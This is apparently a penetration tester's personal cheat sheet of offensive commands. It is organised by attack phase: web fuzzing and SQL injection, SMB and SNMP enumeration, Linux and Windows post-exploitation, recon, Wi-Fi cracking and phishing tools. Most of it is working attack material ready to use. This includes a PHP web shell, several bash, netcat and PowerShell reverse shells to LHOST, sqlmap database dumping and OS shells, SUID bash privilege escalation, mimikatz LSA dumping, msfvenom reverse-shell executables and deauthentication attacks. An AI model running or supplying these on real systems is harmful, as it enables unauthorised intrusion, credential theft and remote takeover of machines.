https://github.com/melnicek/melnicek.github.io/edit/master/notes.txt

rustscan -a $IP -- -sVC -oN nmap-tcp
sudo nmap -sU $IP -oN nmap-udp

################################################################ WEB

ffuf -w ~/wordlists/raft.txt -u http://$IP/FUZZ
ffuf -w ~/wordlists/subdomains.txt -u http://$IP/ -H 'Host: FUZZ.DOMAIN'

ffuf -w WORDLIST -u http://$IP/?id=FUZZ
ffuf -w WORDLIST -u http://$IP/ -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'

nikto -host URL
nikto -Plugins 'PLUGIN' -host URL

wpscan...

sqlmap -r REQFILE --batch
sqlmap -i URL -p PARAMETER --cookie="COOKIE" --batch
sqlmap -i URL -p PARAMETER --cookie="COOKIE" --batch --current-user --current-db
sqlmap -i URL -p PARAMETER --cookie="COOKIE" --batch -D DATABASE --tables
sqlmap -i URL -p PARAMETER --cookie="COOKIE" --batch -D DATABASE -T TABLE --dump
sqlmap -i URL -p PARAMETER --cookie="COOKIE" --batch --os-shell
https://portswigger.net/web-security/sql-injection/cheat-sheet

<pre><?php system($_REQUEST["yz"])?></pre><hr><form method="POST"><input type="text" id="yz" name="yz"><input type="submit" value="Submit"></form>

https://github.com/mthbernardes/LFI-Enum.git

################################################################ INITIAL COMPROMISE

crackmapexec smb $IP -u '' -p '' --shares
crackmapexec smb $IP -u users.txt -p pass.txt --shares
crackmapexec smb $IP -u users.txt -p pass.txt --continue-on-succes

evil-winrm -u USER -p PASS -i $IP

snmp-check $IP
snmpwalk -v1 -c public $IP
snmpwalk -v2c -c public $IP

sudo mount -t cifs -o 'username=USER,password=PASS' //RHOST/SHARE /mnt/FOLDER

rpcclient -U '' -N $IP
> querydispinfo
> enumdomusers

git clone https://github.com/SecureAuthCorp/impacket

################################################################ POST LINUX

git clone https://github.com/melnicek/peh

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/y
rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/ssh -i 2>&1|telnet LHOST LPORT >/tmp/y
nc -e /bin/sh LHOST LPORT
nc -c /bin/sh LHOST LPORT

SHELL=/bin/bash script -q /dev/null
[Ctrl + Z]
stty raw -echo
fg
reset
xterm

cp /bin/bash /tmp/yz
chmod +s /tmp/yz
/tmp/yz -p

ssh -L LPORT:RHOST:RPORT USER@RHOST -fN

for i in {1..254}; do (ping -c 1 x.x.x.${i} | grep "bytes from" &); done; sleep 2; arp -en | grep -v incomplete
for i in {1..65535}; do (echo > /dev/tcp/x.x.x.x/$i) >/dev/null 2>&1 && echo $i is open; done

sudo tcpdump -D
sudo tcpdump -i INTERFACE
sudo tcpdump -i INTERFACE -e
sudo tcpdump -i INTERFACE -X
sudo tcpdump -i INTERFACE host HOST
sudo tcpdump -i INTERFACE src host HOST
sudo tcpdump -i INTERFACE tcp src port PORT

################################################################ POST WINDOWS

powershell -command "$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

certutil.exe -urlcache -split -f "URL" OUTFILE

xfreerdp /u:USER /p:PASS /cert:ignore /v:RHOST

cmdkey /list
vaultcmd /list
vaultcmd /listcreds:"VAULT"
runas /user:USER /savecred EXECUTABLE

powershell -ep bypass

. .\PowerView.ps1
Get-NetUser | select cn
Get-NetGroup -GroupName *admin*
Get-NetShare
Invoke-ShareFinder
Get-NetComputers
Get-NetComputer -fulldata | select operatingsystem
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN -ZipFileName loot.zip

mimikatz.exe
> privilege::debug
> lsadump::lsa /patch
john crack.me --wordlist=~/wordlists/rockyou.txt --format=NT

use exploit/windows/local/persistence
set session 1

# INSECURE SERVICE PERMISSIONS
C:\PrivEsc\accesschk.exe /accepteula -uwcqv USER SERVICE
sc qc SERVICE
sc config SERVICE binpath="PATH"
net start daclsvc

# UNQUOTED SERVICE PATH
sc qc SERVICE
accesschk.exe /accepteula -uwdq "PATH" 
copy SHELL "PATH"
net start SERVICE

################################################################ RECON

amass enum -d DOMAIN -ip -src -dir OUT
amass intel -asn ASN -dir OUT
amass intel -whois -d DOMAIN -dir OUT
amass db -dir INPUT -list
amass db -dir INPUT -enum ID -show
amass viz -dir INPUT -d3

sniper -t DOMAIN
sniper -t DOMAIN -m stealth -o -re

./theHarvester.py -d DOMAIN -l 500 -b google,bing,yahoo,duckduckgo
./theHarvester.py -d DOMAIN -c
./theHarvester.py -d DOMAIN -l 500 -b google,bing,yahoo,duckduckgo -n
./theHarvester.py -d DOMAIN -l 500 -b linkedin
./theHarvester.py -d DOMAIN -l 500 -b twitter
./theHarvester.py -d DOMAIN -l 500 -b all

recon-ng
> workspaces create DOMAIN
> options list
> db insert TABLE
> show TABLE
> marketplace search
> marketplace install SMART
> modules search
> modules load MODULE
> info
> run

################################################################ MSFVENOM

msfvenom -p windows/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f exe > shell-x64.exe
msfvenom -p windows/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f exe > shell-x86.exe

################################################################ WIRELESS

airmon-ng check
airmon-ng check kill
airmon-ng start INTERFACE
airodump-ng INTERFACE
airodump-ng INTERFACE --bssid APMAC -c CHANNEL -w CAPFILE
aireplay-ng INTERFACE --deauth 20 -a APMAC -h CLIENTMAC
aircrack-ng -w WORDLIST CAPFILE
airmon-ng stop INTERFACE
systemctl start network-manager

git clone https://github.com/P0cL4bs/wifipumpkin3

################################################################ PHISHING

git clone https://github.com/gophish/gophish

git clone https://github.com/rsmusllp/king-phisher

git clone https://github.com/curi0usJack/luckystrike

git clone https://github.com/sevagas/macro_pack

################################################################ ANDROID

adb shell pm list packages
adb shell pm path PACKAGE
adb pull APKPATH DESTINATION
